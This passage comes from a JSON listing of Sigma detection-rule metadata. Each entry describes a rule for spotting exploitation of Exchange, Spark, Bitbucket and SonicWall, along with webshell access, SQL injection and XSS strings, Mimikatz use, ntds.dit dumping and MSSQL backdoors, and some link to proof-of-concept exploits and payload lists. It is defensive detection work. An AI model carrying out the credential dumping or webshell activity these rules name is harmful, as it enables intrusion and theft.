- "Legitimate access to the URI"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective",
- "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c",
- "value": "Apache Spark Shell Command Injection - Weblogs",
- "meta": {
- "refs": [
- "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
- "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html",
- "https://github.com/apache/spark/pull/36315/files",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.33891"
- ],
- "creation_date": "2022/07/19",
- "filename": "web_cve_2022_33891_spark_shell_command_injection.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804",
- "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685",
- "value": "Atlassian Bitbucket Command Injection Via Archive API",
- "meta": {
- "refs": [
- "https://twitter.com/_0xf4n9x_/status/1572052954538192901",
- "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/",
- "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html",
- "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.36804"
- ],
- "creation_date": "2022/09/29",
- "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity",
- "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2",
- "value": "Exchange Exploitation Used by HAFNIUM",
- "meta": {
- "refs": [
- "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/03/03",
- "filename": "web_exchange_exploitation_hafnium.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)",
- "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef",
- "value": "Exchange ProxyShell Pattern",
- "meta": {
- "refs": [
- "https://youtu.be/5mqid-7zp8k?t=2231",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
- "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/08/07",
- "filename": "web_exchange_proxyshell.yml",
- "author": "Florian Roth, Rich Warren",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers",
- "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8",
- "value": "Successful Exchange ProxyShell Attack",
- "meta": {
- "refs": [
- "https://youtu.be/5mqid-7zp8k?t=2231",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
- "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml"
- ],
- "tags": [
- "attack.initial_access"
- ],
- "creation_date": "2021/08/09",
- "filename": "web_exchange_proxyshell_successful.yml",
- "author": "Florian Roth, Rich Warren",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"",
- "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac",
- "value": "Successful IIS Shortname Fuzzing Scan",
- "meta": {
- "refs": [
- "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml",
- "https://www.exploit-db.com/exploits/19525",
- "https://github.com/lijiejie/IIS_shortname_Scanner",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/10/06",
- "filename": "web_iis_tilt_shortname_scan.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects possible Java payloads in web access logs",
- "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c",
- "value": "Java Payload Strings",
- "meta": {
- "refs": [
- "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/",
- "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/",
- "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md",
- "https://twitter.com/httpvoid0x2f/status/1532924261035384832",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml"
- ],
- "tags": [
- "cve.2022.26134",
- "cve.2021.26084"
- ],
- "creation_date": "2022/06/04",
- "filename": "web_java_payload_in_access_logs.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Legitimate apps"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation attempt using the JDNIExploiit Kit",
- "uuid": "412d55bc-7737-4d25-9542-5b396867ce55",
- "value": "JNDIExploit Pattern",
- "meta": {
- "refs": [
- "https://github.com/pimps/JNDI-Exploit-Kit",
- "https://githubmemory.com/repo/FunctFan/JNDIExploit",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2021/12/12",
- "filename": "web_jndi_exploit.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Legitimate apps the use these paths"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects possible exploitation activity or bugs in a web application",
- "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af",
- "value": "Multiple Suspicious Resp Codes Caused by Single Client",
- "meta": {
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_multiple_susp_resp_codes_single_source.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2017/02/19",
- "filename": "web_multiple_susp_resp_codes_single_source.yml",
- "author": "Thomas Patzke",
- "level": "medium",
- "falsepositive": [
- "Unstable application",
- "Application that misuses the response codes"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.",
- "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56",
- "value": "Nginx Core Dump",
- "meta": {
- "refs": [
- "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps",
- "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1499.004"
- ],
- "creation_date": "2021/05/31",
- "filename": "web_nginx_core_dump.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Serious issues with a configuration or plugin"
- ],
- "logsource.category": "No established category",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects path traversal exploitation attempts",
- "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35",
- "value": "Path Traversal Exploitation Attempts",
- "meta": {
- "refs": [
- "https://github.com/projectdiscovery/nuclei-templates",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_path_traversal_exploitation_attempt.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/09/25",
- "filename": "web_path_traversal_exploitation_attempt.yml",
- "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)",
- "level": "medium",
- "falsepositive": [
- "Happens all the time on systems exposed to the Internet",
- "Internal vulnerability scanners"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report",
- "uuid": "a2cee20b-eacc-459f-861d-c02e5d12f1db",
- "value": "Solarwinds SUPERNOVA Webshell Access",
- "meta": {
- "refs": [
- "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
- "https://www.anquanke.com/post/id/226029",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003"
- ],
- "creation_date": "2020/12/17",
- "filename": "web_solarwinds_supernova_webshell.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit",
- "uuid": "6f55f047-112b-4101-ad32-43913f52db46",
- "value": "SonicWall SSL/VPN Jarrewrite Exploit",
- "meta": {
- 
"refs": [ - "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sonicwall_jarrewrite_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access" - ], - "creation_date": "2021/01/25", - "filename": "web_sonicwall_jarrewrite_exploit.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", - "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", - "value": "Source Code Enumeration Detection by Keyword", - "meta": { - "refs": [ - "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", - "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2019/06/08", - "filename": "web_source_code_enumeration.yml", - "author": "James Ahearn", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects SQL Injection attempts via GET requests in access logs", - "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", - "value": "SQL Injection Strings", - "meta": { - "refs": [ - "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", - "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", - "https://brightsec.com/blog/sql-injection-payloads/", - "https://github.com/payloadbox/sql-injection-payload-list", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" 
- ], - "tags": "No established tags", - "creation_date": "2020/02/22", - "filename": "web_sql_injection_in_access_logs.yml", - "author": "Saw Win Naung, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Java scripts and CSS Files", - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects SSTI attempts sent via GET requests in access logs", - "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", - "value": "Server Side Template Injection Strings", - "meta": { - "refs": [ - "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", - "https://github.com/payloadbox/ssti-payloads", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_ssti_in_access_logs.yml" - ], - "tags": "No established tags", - "creation_date": "2022/06/14", - "filename": "web_ssti_in_access_logs.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", - "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", - "value": "Suspicious User-Agents Related To Recon Tools", - "meta": { - "refs": [ - "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", - 
"https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", - "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2022/07/19", - "filename": "web_susp_useragents.yml", - "author": "Nasreddine Bencherchali, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication", - "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", - "value": "Suspicious Windows Strings In URI", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_windows_path_uri.yml" - ], - "tags": [ - "attack.persistence", - "attack.exfiltration", - "attack.t1505.003" - ], - "creation_date": "2022/06/06", - "filename": "web_susp_windows_path_uri.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate application and websites that use windows paths in their URL" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects access to DEWMODE webshell as described in FIREEYE report", - "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5", - "value": "DEWMODE Webshell Access", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_unc2546_dewmode_php_webshell.yml" - ], - "tags": [ - "attack.persistence", - 
"attack.t1505.003" - ], - "creation_date": "2021/02/22", - "filename": "web_unc2546_dewmode_php_webshell.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", - "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", - "value": "Webshell ReGeorg Detection Via Web Logs", - "meta": { - "refs": [ - "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", - "https://github.com/sensepost/reGeorg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2020/08/04", - "filename": "web_webshell_regeorg.yml", - "author": "Cian Heasley", - "level": "high", - "falsepositive": [ - "Web applications that use the same URL parameters as ReGeorg" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Windows Webshells that use GET requests via access logs", - "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", - "value": "Windows Webshell Strings", - "meta": { - "refs": [ - "https://bad-jubies.github.io/RCE-NOW-WHAT/", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2017/02/19", - "filename": "web_win_webshells_in_access_logs.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", - "User 
searches in search boxes of the respective website" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects XSS attempts injected via GET requests in access logs", - "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", - "value": "Cross Site Scripting Strings", - "meta": { - "refs": [ - "https://github.com/payloadbox/xss-payload-list", - "https://portswigger.net/web-security/cross-site-scripting/contexts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" - ], - "tags": "No established tags", - "creation_date": "2021/08/15", - "filename": "web_xss_in_access_logs.yml", - "author": "Saw Win Naung, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "JavaScripts,CSS Files and PNG files", - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", - "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", - "value": "Mimikatz Use", - "meta": { - "refs": [ - "https://tools.thehacker.recipes/mimikatz/modules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml" - ], - "tags": [ - "attack.s0002", - "attack.lateral_movement", - "attack.credential_access", - "car.2013-07-001", - "car.2019-04-004", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.001", - "attack.t1003.006" - ], - "creation_date": "2017/01/10", - "filename": "win_alert_mimikatz_keywords.yml", - "author": "Florian Roth (rule), David ANDRE (additional 
keywords)", - "level": "high", - "falsepositive": [ - "Naughty administrators", - "AV Signature updates", - "Files with Mimikatz in their filename" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "value": "Audit CVE Event", - "meta": { - "refs": [ - "https://twitter.com/VM_vivisector/status/1217190929330655232", - "https://twitter.com/DidierStevens/status/1217533958096924676", - "https://twitter.com/FlemmingRiis/status/1217147415482060800", - "https://www.youtube.com/watch?v=ebmW42YYveI", - "https://nullsec.us/windows-event-log-audit-cve/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" - ], - "creation_date": "2020/01/15", - "filename": "win_audit_cve.yml", - "author": "Florian Roth, Zach Mathis", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This detection method points out highly relevant Antivirus events", - "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", - "value": "Relevant Anti-Virus Event", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", - 
"https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", - "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588" - ], - "creation_date": "2017/02/19", - "filename": "win_av_relevant_match.yml", - "author": "Florian Roth, Arnim Rupp", - "level": "high", - "falsepositive": [ - "Some software piracy tools (key generators, cracks) are classified as hack tools" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "An application has been removed. Check if it is critical.", - "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", - "value": "Application Uninstalled", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_builtin_remove_application.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2022/01/28", - "filename": "win_builtin_remove_application.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "uuid": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", - "value": "Ntdsutil Abuse", - "meta": { - "refs": [ - "https://twitter.com/mgreen27/status/1558223256704122882", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/14", - "filename": "win_esent_ntdsutil_abuse.yml", - "author": "Nasreddine 
Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate backup operation/creating shadow copies" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "uuid": "94dc4390-6b7c-4784-8ffc-335334404650", - "value": "Dump Ntds.dit To Suspicious Location", - "meta": { - "refs": [ - "https://twitter.com/mgreen27/status/1558223256704122882", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/14", - "filename": "win_esent_ntdsutil_abuse_susp_location.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate backup operation/creating shadow copies" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects MSI package installation from suspicious locations", - "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341", - "value": "MSI Installation From Suspicious Locations", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/31", - "filename": "win_msi_install_from_susp_locations.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Some false positives may occur depending on the environnement" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": 
"Detects installation of a remote msi file from web.", - "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", - "value": "MSI Installation From Web", - "meta": { - "refs": [ - "https://twitter.com/_st0pp3r_/status/1583922009842802689", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_web.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218", - "attack.t1218.007" - ], - "creation_date": "2022/10/23", - "filename": "win_msi_install_from_web.yml", - "author": "Stamatis Chatzimangou", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "uuid": "08200f85-2678-463e-9c32-88dce2f073d1", - "value": "MSSQL Add Account To Sysadmin Role", - "meta": { - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/13", - "filename": "win_mssql_add_sysadmin_account.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "value": "MSSQL Disable Audit Settings", - "meta": { - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - 
"https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", - "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/07/13", - "filename": "win_mssql_disable_audit_settings.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "value": "MSSQL Extended Stored Procedure Backdoor Maggie", - "meta": { - "refs": [ - "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_maggie.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546" - ], - "creation_date": "2022/10/09", - "filename": "win_mssql_sp_maggie.yml", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", - "level": "high", - "falsepositive": [ - "Legitimate extended stored procedures named maggie" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. 
A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", - "value": "MSSQL SPProcoption Set", - "meta": { - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/13", - "filename": "win_mssql_sp_procoption_set.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate use of the feature by administrators (rare)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "uuid": "7f103213-a04e-4d59-8261-213dddf22314", - "value": "MSSQL XPCmdshell Suspicious Execution", - "meta": { - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/12", - "filename": "win_mssql_xp_cmdshell_audit_log.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "uuid": "d08dd86f-681e-4a00-a92c-1db218754417", - "value": "MSSQL 
